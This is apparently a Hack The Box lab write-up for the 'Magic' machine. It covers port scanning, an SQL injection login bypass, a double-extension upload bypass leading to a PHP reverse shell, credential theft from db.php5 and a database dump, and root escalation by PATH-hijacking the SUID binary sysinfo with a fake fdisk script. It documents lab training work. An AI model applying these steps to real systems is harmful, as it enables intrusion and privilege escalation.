Magic - wook413

#hackthebox #linux #medium ![[Pasted image 20250817133158.png]] # Information Gathering - Nmap I started the box with scanning all TCP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:31 UTC Nmap scan report for 10.10.10.185 Host is up (0.058s latency). Not shown: 64994 closed tcp ports (reset), 539 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 16.89 seconds ``` Then I scanned one more time against those open ports found: 22 and 80 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:33 UTC Nmap scan report for 10.10.10.185 Host is up (0.046s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds ``` Lastly, I performed a UDP scan against the top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:34 UTC Nmap scan report for 10.10.10.185 Host is up (0.046s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp open|filtered msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp open|filtered ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds ``` --- # Enumeration ##### HTTP - TCP 80 The landing page of port 80 looks like this: ![[Pasted image 20250817113904.png]] `/login.php` has a login form. I attempted a few default credentials but none of them worked. ![[Pasted image 20250817114036.png]] I ran `gobuster` but didn't find anything useful. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.185 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 313] [--> http://10.10.10.185/images/] /assets (Status: 301) [Size: 313] [--> http://10.10.10.185/assets/] Progress: 87664 / 87665 (100.00%) =============================================================== Finished =============================================================== ``` One thing that caught my attention was the text above this image. I first thought the whole thing was just an image but it's actually text on top of an image. ![[Pasted image 20250817115145.png]] The source code reads like this: `<div align="center"><h1>m̴̛̫̼̟͔̼̗̼͈̒̐ȧ̷̹͍̝̬͈̦͊́̿̊̿̈́g̷̲͚̖̣̪͙͎̏͂̿̇̇ͅi̴̺̻̝͍̦͎͇̞͖̅͋́c̴̢͙͇̙̣̟̿̒̑͂͐̔͂</h1><br></div>` Back to `/login.php`, I intercepted the request to log in and tried a few of simple SQLi payloads. This payload triggered something and the server returned `302 Found`. ![[Pasted image 20250817115709.png]] I followed redirection and it directed me to `/upload.php`. ![[Pasted image 20250817115753.png]] # Initial Access - Shell as `www-data` ![[Pasted image 20250817115953.png]] I uploaded a random image file that was on my Desktop and the webpage tells me the file has been uploaded. ![[Pasted image 20250817120036.png]] I made exactly the same request except I changed the file extension to `.php` and this time the server returned `Sorry, only JPG, JPEG & PNG files are allowed.` ![[Pasted image 20250817120223.png]] However, I was able to bypass this filter just by appending `.png` after `.php`. ![[Pasted image 20250817120352.png]] I replaced the png file data with a simple php one-liner payload and it still got accepted by the server. Let's check if we could perform command execution via the uploaded file. ![[Pasted image 20250817120531.png]] I passed `id` as parameter and the page displayed the value of `id` command, which indicates the web page is vulnerable to `File Upload + Command Execution` combination. ![[Pasted image 20250817120755.png]] Then I replaced the php one-liner payload with `Pentest Monkey`'s php-reverse-shell and named it as `wook.php.png`. ![[Pasted image 20250817121844.png]] Navigating to `http://10.10.10.185/images/uploads/wook.php.png` triggered the payload on the server and I successfully got the reverse shell as `www-data` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.185] 60248 Linux magic 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 10:18:05 up 49 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data ``` # Privilege Escalation - shell as `theseus` `ss` reveals the port 3306 is currently listening internally, which indicates there might be `MySQL` service running ```bash www-data@magic:/opt$ ss -tulnp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:* udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:39442 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:* udp UNCONN 0 0 [::]:54061 [::]:* udp UNCONN 0 0 [::]:5353 [::]:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:* tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 5 [::1]:631 [::]:* ``` `/etc/passwd` also shows user `mysql` exists. ```bash mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false ``` In `/var/www/Magic` directory, this file `db.php5` stood out to me. ```bash www-data@magic:/var/www/Magic$ ls -l total 40 drwxrwxr-x 6 www-data www-data 4096 Jul 6 2021 assets -rw-r--r-- 1 www-data www-data 881 Oct 16 2019 db.php5 drwxr-xr-x 4 www-data www-data 4096 Jul 6 2021 images -rw-rw-r-- 1 www-data www-data 4528 Oct 22 2019 index.php -rw-r--r-- 1 www-data www-data 5539 Oct 22 2019 login.php -rw-r--r-- 1 www-data www-data 72 Oct 18 2019 logout.php -rw-r--r-- 1 www-data www-data 4520 Oct 22 2019 upload.php ``` As expected, it contained a set of credentials inside it. `theseus:iamkingtheseus` ```bash www-data@magic:/var/www/Magic$ cat db.php5 <?php class Database { private static $dbName = 'Magic' ; private static $dbHost = 'localhost' ; private static $dbUsername = 'theseus'; private static $dbUserPassword = 'iamkingtheseus'; private static $cont = null; public function __construct() { die('Init function is not allowed'); } public static function connect() { // One connection through whole application if ( null == self::$cont ) { try { self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword); } catch(PDOException $e) { die($e->getMessage()); } } return self::$cont; } public static function disconnect() { self::$cont = null; } } ``` I was going to connect to `mysql` server but mysql appears to be not installed on the target box. ```bash www-data@magic:/home$ mysql -h localhost -u theseus -p Command 'mysql' not found, but can be installed with: apt install mysql-client-core-5.7 apt install mariadb-client-core-10.1 Ask your administrator to install one of them. ``` I typed `mysql` and the autocomplete shows many other options that I could possibly use. ```bash www-data@magic:/var/www/Magic$ mysql mysql_config_editor mysqld mysql_embedded mysqld_multi mysql_install_db mysqld_safe mysql_plugin mysqldump mysql_secure_installation mysqldumpslow mysql_ssl_rsa_setup mysqlimport mysql_tzinfo_to_sql mysqloptimize mysql_upgrade mysqlpump mysqladmin mysqlrepair mysqlanalyze mysqlreport mysqlbinlog mysqlshow mysqlcheck mysqlslap ``` I dumped all of the databases and this part of the dump shows a set of credentials I am interested `admin:Th3s3usW4sK1ng` ```bash -- -- Dumping data for table `login` -- LOCK TABLES `login` WRITE; /*!40000 ALTER TABLE `login` DISABLE KEYS */; INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng'); /*!40000 ALTER TABLE `login` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2025-08-17 10:45:23 ``` Successfully logged in as `theseus` with the found credentials. ```bash www-data@magic:/var/www/Magic$ su theseus Password: theseus@magic:/var/www/Magic$ id; whoami uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users) theseus ``` # Privilege Escalation - shell as `root` Found `user.txt` in `/home/theseus` ```bash theseus@magic:~$ ls Desktop Downloads Pictures Templates Videos Documents Music Public user.txt theseus@magic:~$ cat user.txt 24d... ``` ```bash theseus@magic:/var/www/Magic$ find / -type f -perm -4000 2>/dev/null | grep -v snap /usr/sbin/pppd /usr/bin/newgrp /usr/bin/passwd /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/bin/pkexec /usr/bin/chsh /usr/bin/traceroute6.iputils /usr/bin/arping /usr/bin/vmware-user-suid-wrapper /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/xorg/Xorg.wrap /bin/umount /bin/fusermount /bin/sysinfo /bin/mount /bin/su /bin/ping ``` `/bin/sysinfo` stood out to me. I confirmed it has a SUID bit set. ```bash theseus@magic:/var/www/Magic$ ls -l /bin/sysinfo -rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo theseus@magic:/var/www/Magic$ id uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users) ``` I ran `sysinfo` binary ```bash theseus@magic:/var/www/Magic$ sysinfo ====================Hardware Info==================== H/W path Device Class Description ==================================================== system VMware Virtual Platform /0 bus 440BX Desktop Reference Platform /0/0 memory 86KiB BIOS /0/1 processor AMD EPYC 7763 64-Core Processor ... ``` If you run `sysinfo` with `ltrace`, it prints out all of the calls made outside the binary. There's a ton of calls but this one stood out to me. `popen("fdisk -l", "r")`. `popen` is another way to open a process on Linux. The binary is making a call to `fdisk` but it forgot to specify the full path, which can lead to `path hijacking` attack. ![[Pasted image 20250817131650.png]] In order to perform Path Hijacking attack, I'm first going to generate a payload. When `sysinfo` is run, this payload is going to be triggered to make a copy of root's `/bin/bash` with SUID bit set. We have to name this file `fdisk` or else this isn't going to work. ```bash theseus@magic:/tmp$ ls fdisk theseus@magic:/tmp$ cat fdisk #!/bin/bash cp /bin/bash /tmp/wook chown root:root /tmp/wook chmod 6777 /tmp/wook ``` because I created the payload in `/tmp` directory, I am going to add `tmp` directory to `PATH` environment variable. ```bash theseus@magic:/tmp$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games theseus@magic:/tmp$ export PATH=/tmp:$PATH theseus@magic:/tmp$ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games ``` Run `sysinfo` to trigger the payload. ```bash theseus@magic:/tmp$ sysinfo ====================Hardware Info==================== H/W path Device Class Description ==================================================== system VMware Virtual Platform /0 bus 440BX Desktop Reference Platform /0/0 memory 86KiB BIOS /0/1 processor AMD EPYC 7763 64-Core Processor ... <SNIP> ``` I navigated to `/tmp` and my binary was created with full privileges. ```bash theseus@magic:/tmp$ ls fdisk wook theseus@magic:/tmp$ ls -l wook -rwsrwsrwx 1 root root 1113504 Aug 17 11:26 wook ``` Gained shell as `root` ```bash theseus@magic:/tmp$ ./wook -p wook-4.4# whoami root ``` Found `root.txt` ```bash wook-4.4# cd /root wook-4.4# ls info.c root.txt snap wook-4.4# cat root.txt 3d0... ```